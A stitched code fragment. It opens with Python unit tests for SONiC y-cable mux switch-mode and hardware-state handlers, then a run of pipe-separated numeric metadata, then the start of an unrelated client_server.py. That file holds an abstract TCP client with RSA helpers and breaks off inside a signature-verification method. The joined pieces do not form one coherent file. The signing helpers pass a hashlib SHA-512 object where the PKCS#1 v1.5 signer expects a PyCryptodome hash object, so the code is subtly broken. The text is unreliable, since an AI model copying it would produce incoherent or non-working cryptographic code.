def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """Expect None when fvp carries an unrelated key ('down_firmware'), hitting the handler's else branch."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"down_firmware": "null"}

    rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
        fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)

    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_with_instance_manual(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when showing switch mode for an instance reporting manual mode (0)."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"state": "manual"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = 0
                self.SWITCHING_MODE_MANUAL = 0
                self.SWITCHING_MODE_AUTO = 1

            def get_read_side(self):
                return 1

            def get_switching_mode(self):
                # Matches SWITCHING_MODE_MANUAL above.
                return 0

            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
            fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Expect -1 from the show-switchmode handler when no y-cable port instance is patched in."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"state": "manual"}

    rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
        fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_switchmode_cmd_arg_tbl_notification_with_instance_auto(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when showing switch mode for an instance reporting auto mode (1)."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_swmode_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_swmode_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"state": "auto"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = "auto"
                self.SWITCHING_MODE_MANUAL = 0
                self.SWITCHING_MODE_AUTO = 1

            def get_read_side(self):
                return 1

            def get_switching_mode(self):
                # Matches SWITCHING_MODE_AUTO above.
                return 1

            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_show_hwmode_swmode_cmd_arg_tbl_notification(
            fvp, xcvrd_show_hwmode_swmode_cmd_sts_tbl, xcvrd_show_hwmode_swmode_rsp_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Expect -1 from the config-hwmode-state handler in the no-port scenario.

    Note: the physical-port lookup helper is deliberately NOT patched here.
    """
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"config": "active"}

    rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
        fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """Expect None when fvp carries an unrelated key ('down_firmware'), hitting the handler's else branch.

    Renamed from test_handle_show_mux_switchmode_cmd_arg_tbl_notification_else_condition:
    the old name duplicated an earlier test method (silently shadowing it, so only one
    of the two ever ran) and misdescribed the handler under test, which is
    handle_config_hwmode_state_cmd_arg_tbl_notification.
    """
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"down_firmware": "null"}

    rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
        fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)

    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_with_instance_manual(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when configuring hwmode state 'active' on an instance in manual mode (0)."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"config": "active"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = 0
                self.SWITCHING_MODE_MANUAL = 0
                self.SWITCHING_MODE_AUTO = 1

            def get_read_side(self):
                return 1

            def get_switching_mode(self):
                # Matches SWITCHING_MODE_MANUAL above.
                return 0

            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
            fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Expect -1 from the config-hwmode-state handler when no y-cable port instance is patched in."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"config": "active"}

    rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
        fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_config_mux_state_cmd_arg_tbl_notification_with_instance_auto(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when configuring hwmode state 'active' on an instance in auto mode (1)."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_config_hwmode_state_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_config_hwmode_state_rsp_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"config": "active"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = "auto"
                self.SWITCHING_MODE_MANUAL = 0
                self.SWITCHING_MODE_AUTO = 1

            def get_read_side(self):
                return 1

            def get_switching_mode(self):
                # Matches SWITCHING_MODE_AUTO above.
                return 1

            # Defining function without self argument creates an exception,
            # which is what we want for this test.
            def get_mux_direction():
                pass

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_config_hwmode_state_cmd_arg_tbl_notification(
            fvp, xcvrd_config_hwmode_state_cmd_sts_tbl, xcvrd_config_hwmode_state_rsp_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
    """Expect -1 from the show-hwmode-state handler in the no-port scenario.

    Note: the physical-port lookup helper is deliberately NOT patched here.
    """
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"state": "active"}

    rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
        fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
    """Expect None when fvp carries an unrelated key ('down_firmware'), hitting the handler's else branch."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"down_firmware": "null"}

    rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
        fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)

    assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_with_instance_manual(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when showing hwmode state for an instance whose mux direction is 1."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"state": "active"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = 0
                self.SWITCHING_MODE_MANUAL = 0
                self.SWITCHING_MODE_AUTO = 1

            def get_read_side(self):
                return 1

            def get_mux_direction(self):
                # Same value as get_read_side -> direction matches read side.
                return 1

            def get_switching_mode(self):
                return 0

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
            fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
        assert rc is None
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "fec", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
    """Expect -1 from the show-hwmode-state handler when no y-cable port instance is patched in."""
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    fvp = {"state": "active"}

    rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
        fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)

    assert rc == -1
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type',
       MagicMock(return_value=(0, "activate_firmware", {"modex": "0", "lane_mask": "0", "direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
@patch('time.sleep', MagicMock(return_value=True))
def test_handle_show_mux_state_cmd_arg_tbl_notification_with_instance_auto(self, platform_sfputil, mock_swsscommon_table):
    """Expect None (success) when showing hwmode state for an instance whose mux direction (2) differs from the read side (1)."""
    # NOTE: @patch args are injected bottom-up, so the sfputil mock arrives
    # before the Table mock; the original signature had the two names swapped.
    mock_swsscommon_table.return_value = MagicMock()
    xcvrd_show_hwmode_dir_cmd_sts_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_rsp_tbl = mock_swsscommon_table
    xcvrd_show_hwmode_dir_res_tbl = mock_swsscommon_table
    asic_index = 0
    port = "Ethernet0"
    platform_sfputil.get_asic_id_for_logical_port = 0
    fvp = {"state": "active"}

    with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:

        class PortInstanceHelper():
            """Minimal stand-in for a y-cable port instance object."""

            def __init__(self):
                self.EEPROM_ERROR = -1
                self.TARGET_NIC = 1
                self.TARGET_TOR_A = 1
                self.TARGET_TOR_B = 1
                self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
                self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
                self.download_firmware_status = 0
                self.SWITCH_COUNT_MANUAL = "manual"
                self.SWITCH_COUNT_AUTO = "auto"
                self.SWITCHING_MODE_MANUAL = 0
                self.SWITCHING_MODE_AUTO = 1

            def get_read_side(self):
                return 1

            def get_switching_mode(self):
                return 1

            def get_mux_direction(self):
                # Deliberately different from get_read_side().
                return 2

        patched_util.get.return_value = PortInstanceHelper()
        rc = handle_show_hwmode_state_cmd_arg_tbl_notification(
            fvp, xcvrd_show_hwmode_dir_cmd_sts_tbl, xcvrd_show_hwmode_dir_rsp_tbl, xcvrd_show_hwmode_dir_res_tbl, asic_index, port)
        assert rc is None
| 52.190507
| 160
| 0.63016
| 28,574
| 244,095
| 4.868902
| 0.013334
| 0.045025
| 0.047698
| 0.086657
| 0.966914
| 0.962501
| 0.957405
| 0.951267
| 0.948736
| 0.946213
| 0
| 0.010766
| 0.288404
| 244,095
| 4,676
| 161
| 52.201668
| 0.790192
| 0.005043
| 0
| 0.892984
| 0
| 0
| 0.215549
| 0.174825
| 0
| 0
| 0
| 0
| 0.071526
| 1
| 0.085449
| false
| 0.004368
| 0.003276
| 0.021294
| 0.120393
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65013262edc489f6c25cf54b98d7088a57f7ac87
| 19,177
|
py
|
Python
|
client_server.py
|
shahafashash/protocols
|
4d953dfb39d976d33628778673f6aae1b0235750
|
[
"MIT"
] | null | null | null |
client_server.py
|
shahafashash/protocols
|
4d953dfb39d976d33628778673f6aae1b0235750
|
[
"MIT"
] | null | null | null |
client_server.py
|
shahafashash/protocols
|
4d953dfb39d976d33628778673f6aae1b0235750
|
[
"MIT"
] | null | null | null |
from abc import ABCMeta, abstractmethod
from socket import socket, AF_INET, SOCK_STREAM
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Signature.pkcs1_15 import PKCS115_SigScheme
from Crypto.Util.Padding import pad, unpad
from hashlib import sha512
from pathlib import Path
from secrets import token_bytes
from base64 import b64encode, b64decode
class Client(metaclass=ABCMeta):
    """Abstract TCP client with RSA/AES crypto helper methods.

    Subclasses must implement ``do_handshake``, which is invoked right
    after the TCP connection is established; the connection is kept only
    if the handshake reports success.

    NOTE: the original source defined ``recieve_message`` and
    ``do_handshake`` twice each; the first definitions were shadowed dead
    code (last ``def`` wins) and have been removed.
    """

    def __init__(self) -> None:
        """Instantiate a client object with no open connection."""
        # Name-mangled attribute; exposed read-only via the `conn` property.
        self.__conn = None

    @property
    def conn(self) -> socket:
        """Returns the socket representing the connection with the server

        Returns:
            socket: Connection with the server, or None if not connected
        """
        return self.__conn

    def connect_to_server(self, host='127.0.0.1', port=1234) -> bool:
        """Connect to server with the given host address on the given port

        Args:
            host (str, optional): IP or URL address of the server. Defaults to '127.0.0.1'.
            port (int, optional): Port the server will listen to. Defaults to 1234.

        Returns:
            bool: 'True' if handshake established successfully and 'False' if not
        """
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, port))
        self.__conn = s
        result = self.do_handshake()
        if result == True:
            return True
        else:
            # Handshake failed: forget the socket so `conn` reads as "not
            # connected".  NOTE(review): the socket object is not closed
            # here — confirm whether it should be.
            self.__conn = None
            return False

    def send_message(self, message: str) -> None:
        """Send a message to the server

        Args:
            message (str): Message to send to server
        """
        # NOTE(review): socket.send may transmit fewer bytes than given;
        # sendall would guarantee full delivery — confirm intent.
        self.__conn.send(message.encode('utf-8'))

    def recieve_message(self) -> str:
        """Receive a message from the server

        Returns:
            str: Message received from the server (at most 1024 bytes read)
        """
        message = self.__conn.recv(1024).decode('utf-8')
        return message

    @abstractmethod
    def do_handshake(self) -> bool:
        """Hook function - Handshake before establishing a connection

        Returns:
            bool: 'True' if handshake established successfully and 'False' if not
        """
        # Default: no handshake.
        return True

    def generate_rsa_keys(self, size=2048) -> RSA.RsaKey:
        """Generates RSA keys with a given size

        Args:
            size (int, optional): Size of keys in bits. Defaults to 2048.
                Valid sizes: 1024, 2048, 3072, 4096, 6144, 8192 bits

        Raises:
            ValueError: If given size is not supported

        Returns:
            RSA.RsaKey: Pair of RSA private and public keys
        """
        valid_sizes = [1024, 2048, 3072, 4096, 6144, 8192]
        if size not in valid_sizes:
            raise ValueError(f'Key size is not valid: {size}')
        key_pair = RSA.generate(size)
        return key_pair

    def rsa_encrypt_message(self, message: str, pub_key: RSA.RsaKey) -> bytes:
        """Encrypts the given message using RSA (PKCS#1 OAEP)

        Args:
            message (str): Message to encrypt
            pub_key (RSA.RsaKey): Public RSA key

        Returns:
            bytes: Encrypted message
        """
        # convert string to bytes
        msg = message.encode('utf-8')
        # encrypt message
        encryptor = PKCS1_OAEP.new(pub_key)
        encrypted = encryptor.encrypt(msg)
        return encrypted

    def rsa_decrypt_message(self, enc_message: bytes, key_pair: RSA.RsaKey) -> str:
        """Decrypts the given message using RSA (PKCS#1 OAEP)

        Args:
            enc_message (bytes): Encrypted message
            key_pair (RSA.RsaKey): RSA key pair of private and public keys

        Returns:
            str: Decrypted message
        """
        # decrypt message
        decryptor = PKCS1_OAEP.new(key_pair)
        decrypted = decryptor.decrypt(enc_message)
        # convert bytes to string
        message = decrypted.decode('utf-8')
        return message

    def rsa_sign_message(self, message: bytes, key_pair: RSA.RsaKey) -> bytes:
        """Sign a given message using PKCS#1 standard version 1.5

        Args:
            message (bytes): Message to sign
            key_pair (RSA.RsaKey): RSA key pair of private and public keys

        Returns:
            bytes: Signature over the SHA-512 digest of the message
        """
        digest = sha512(message)
        signer = PKCS115_SigScheme(key_pair)
        signature = signer.sign(digest)
        return signature

    def rsa_verify_signature(self, message: bytes, signature: bytes, pub_key: RSA.RsaKey) -> bool:
        """Verify message signature using PKCS#1 standard version 1.5

        Args:
            message (bytes): Message to compare
            signature (bytes): Signature to verify
            pub_key (RSA.RsaKey): Public RSA key

        Returns:
            bool: 'True' if signature is valid and 'False' if not
        """
        digest = sha512(message)
